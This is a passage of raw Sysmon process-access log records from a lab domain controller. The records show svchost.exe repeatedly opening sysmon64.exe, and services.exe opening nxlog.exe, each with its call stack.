10341000x80000000000000001436Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:15.988{D28789B6-7C64-5FA1-0C00-000000008801}608712C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001435Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:15.988{D28789B6-7C64-5FA1-0C00-000000008801}608712C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001434Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:15.988{D28789B6-7C64-5FA1-0C00-000000008801}608712C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001433Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:15.988{D28789B6-7C64-5FA1-0C00-000000008801}608712C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001432Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:15.988{D28789B6-7C64-5FA1-0C00-000000008801}608712C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001431Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:15.988{D28789B6-7C64-5FA1-0C00-000000008801}608712C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001430Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:15.988{D28789B6-7C64-5FA1-0C00-000000008801}608712C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001429Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:15.988{D28789B6-7C64-5FA1-0C00-000000008801}608712C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001428Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:15.988{D28789B6-7C64-5FA1-0C00-000000008801}608712C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001427Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:15.956{D28789B6-7C62-5FA1-0A00-000000008801}8522484C:\Windows\system32\services.exe{D28789B6-7C65-5FA1-1B00-000000008801}2176C:\Program Files (x86)\nxlog\nxlog.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+64ebf|C:\Windows\system32\services.exe+18ff|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+2e43b|C:\Windows\System32\RPCRT4.dll+6213a|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001426Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:15.941{D28789B6-7C64-5FA1-0C00-000000008801}608712C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001425Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:15.941{D28789B6-7C64-5FA1-0C00-000000008801}608712C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001424Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:15.941{D28789B6-7C64-5FA1-0C00-000000008801}608712C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001423Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:15.941{D28789B6-7C64-5FA1-0C00-000000008801}608712C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001422Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:15.941{D28789B6-7C64-5FA1-0C00-000000008801}608712C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001421Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:15.941{D28789B6-7C64-5FA1-0C00-000000008801}608712C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001420Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:15.941{D28789B6-7C64-5FA1-0C00-000000008801}608712C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001419Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:15.941{D28789B6-7C64-5FA1-0C00-000000008801}608712C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001418Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:15.941{D28789B6-7C64-5FA1-0C00-000000008801}608712C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001417Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:15.941{D28789B6-7C64-5FA1-0C00-000000008801}608712C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001416Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:15.941{D28789B6-7C64-5FA1-0C00-000000008801}608712C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001415Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:15.941{D28789B6-7C64-5FA1-0C00-000000008801}608712C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001414Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:15.941{D28789B6-7C64-5FA1-0C00-000000008801}608712C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001413Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:15.941{D28789B6-7C64-5FA1-0C00-000000008801}608712C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001412Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 